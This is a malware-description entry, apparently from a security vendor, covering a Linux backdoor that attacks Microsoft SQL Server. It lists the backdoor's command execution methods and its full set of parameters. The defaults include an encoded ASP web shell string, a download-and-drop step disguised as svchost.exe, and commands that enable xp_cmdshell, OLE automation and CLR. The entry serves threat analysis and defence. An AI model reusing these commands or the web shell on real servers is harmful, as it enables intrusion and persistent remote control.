Backdoor.Linux.NOODLERAT.A

This Backdoor arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Arrival Details

This Backdoor arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Other Details

This Backdoor does the following:

• It is used to interact with Microsoft SQL Server for command execution, file transfer, and assembly management.
• It performs the following:
  • Execute commands via xp_cmdshell, sp_oacreate, and CLR assemblies.
  • Upload and download files using OLE automation.
  • Create and execute CLR assemblies within SQL Server.
  • Enable or disable xp_cmdshell and OLE automation procedures.
  • List running processes and perform network statistics checks.
  • Supports interactive and non-interactive modes.
  • Load and execute shellcode on the target system.

It accepts the following parameters:

• help, h → Shows a list of commands or help for one command
• --server {value}, --host {value}, -s {value} → The database server (default: "127.0.0.1")
• --user {value}, -u {value} → The database user (default: "sa")
• --password {value}, -p {value} → The database password
• --database {value}, -d {value} → The database name (default: "msdb")
• --port {value}, -P {value} → The database port (default: 1433)
• --option {value} → -xcmd, -X powershell (default: "whoami")
• --query {value}, -q {value}, --sql {value} → SQL query (default: "select @@version")
• --cmd {value}, -c {value}, --exec {value} → Exec System Command | xp_cmdshell命令执行 (default: "whoami")
• --cmd1 {value}, --c1 {value} → Exec System Command | sp_oacreate无回显执行 (default: "whoami >C:\whoami.log")
• --cmd2 {value}, --c2 {value} → Exec System Command | sp_oacreate有回显执行 | wscript.shell (default: "whoami")
• --cmdsp {value} → Exec System Command | sp_oacreate有回显执行 | {72C24DD5-D70A-438B-8A42-98424B88AFB8} (default: "whoami")
• --cmd3 {value}, --c3 {value} → Exec System Command | clr执行 | clr命令参考: https://github.com/uknowsec/SharpSQLTools/ (default: "clr_exec whoami")
• --cmdpy {value} → Exec System Command | clr执行 | clr命令参考: https://github.com/Ridter/PySQLTools (default: "clr_exec whoami")
• --cmd4 {value}, --c4 {value} → Exec System Command | 自写clr执行 (default: "-c4 net -c5 user")
• --cmd5 {value}, --c5 {value} → Exec System Command | 自写clr执行 (default: "-c4 net -c5 user")
• --cmd6 {value}, --c6 {value} → Exec System Command | xp_cmdshell命令执行|过滤了xp_cmdshell等关键字提交方法语句 (default: "-c6 whoami")
• --cmd7 {value}, --c7 {value} → Exec System Command | 自写clr执行 (default: "-c7 whoami")
• --cmd8 {value}, --c8 {value} → Exec System Command | r language command (default: "-c8 whoami")
• --cmd9 {value}, --c9 {value} → Exec System Command | python language command (default: "-c9 whoami")
• --cmd10 {value}, --c10 {value} → Exec System Command | createAndStartJob command (default: "-c10 whoami >c:\windows\temp\123.txt")
• --cmd11 {value}, --c11 {value} → Exec System Command | 自写clr执行 | --option -x --cmd11 cmd | --option -X --cmd11 powershell (default: "--option -x --cmd11 cmd")
• --dir {value}, --dirtree {value} → xp_dirtree列目录 | dir c:
• --path {value} → 网站路径 -path + -code | c:\inetpub\wwwroot\cmd.asp (default: "c:\inetpub\wwwroot\cmd.asp")
• --local {value} → 本地路径 localFile (default: "c:\1.txt")
• --remote {value} → 远程路径 remoteFile (default: "C:\Windows\Temp\1.txt")
• --code {value} → -path + -code | 如果代码有"就加\来匹配<%eval request("cmd")%>网站路径和asp密码默认:LandGrey (default: "<%@codepage=65000%><%@codepage=65000%><%+AHIAZQBzAHAAbwBuAHMAZQAuAGMAbwBkAGUAcABhAGcAZQA9ADYANQAwADAAMQA6AGUAdgBhAGwAKAByAGUAcQB1AGUAcwB0ACgAIgBMAGEAbgBkAEcAcgBlAHkAIgApACk-%>")
• --downurl {value} → 下载文件的url地址 | http://www.microsoft.com/defender.exe
• --filepath {value} → 下载文件的路径 | c:\programdata\svchost.exe
• --debug → Debug info
• --enable, -e → Enabled xp_cmdshell
• --disable, --diclose → Disable xp_cmdshell
• --ole, --oleopen → Enabled sp_oacreate
• --dole, --dolose → Disable sp_oacreate
• --clr, --clropen → Enabled clr enabled
• --dclr, --dclose → Disable clr enabled
• --rlce, --rlceopen → r|python languag eenabled
• --jobopen → MSSQL Agent Job服务开启
• --install_clr, --in_clr → install clr | --cmd3 "clr_exec whoami" | clr命令参考: https://github.com/uknowsec/SharpSQLTools/
• --uninstall_clr, --un_clr → uninstall clr | --cmd3 "clr_exec whoami"
• --installpy_clr, --inpy_clr → installpy clr | --cmdpy "clr_exec whoami" | clr命令参考: https://github.com/Ridter/PySQLTools
• --uninstallpy_clr, --unpy_clr → uninstallpy clr | --cmdpy "clr_exec whoami"
• --install_clrcmd, --in_clrcmd → install clrcmd | "--c4 net --c5 user"
• --uninstall_clrcmd, --un_clrcmd → uninstall clrcmd | "--c4 net --c5 user"
• --install_clrcmd1, --in_clrcmd1 → install clrcmd1 | --cmd7 "whoami"
• --uninstall_clrcmd1, --un_clrcmd1 → uninstall clrcmd | --cmd7 "whoami"
• --install_clrcmd2, --in_clrcmd2 → install clrcmd2 | --cmd11 "whoami"
• --uninstall_clrcmd2, --un_clrcmd2 → uninstall clrcmd2 | --cmd11 "whoami"
• --upload → --upload --local c:\svchost.exe --remote C:\Windows\Temp\svchost.exe
• --help, -h → show help